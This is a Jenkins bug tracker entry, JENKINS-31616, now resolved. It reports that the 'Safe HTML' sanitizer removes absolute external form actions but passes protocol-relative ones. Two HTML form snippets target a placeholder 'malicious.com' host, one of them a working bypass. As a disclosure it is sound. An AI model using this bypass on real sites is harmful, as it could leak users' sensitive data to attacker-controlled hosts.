Uploaded image for project: 'Jenkins'
  1. Jenkins
  2. JENKINS-31616

"Safe HTML" vulnerable to protocol-relative form action


    • Icon: Bug Bug
    • Resolution: Fixed
    • Icon: Minor Minor

      With "safe html" enabled for user text entry, a form with an external action URI is scrubbed. However, is it possible to write a form having a protocol-relative action URI that could be used to leak sensitive data to an external service.

      For example, this HTML is scrubbed correctly with the form action removed:

      <form action="https://malicious.com">
      <input type="submit">

      The form action in this example is not scrubbed and it is possible for a user to create a form that directs to an external site:

      <form action="//malicious.com">
      <input type="submit">

            danielbeck Daniel Beck
            jec Josh Cook
            0 Vote for this issue
            3 Start watching this issue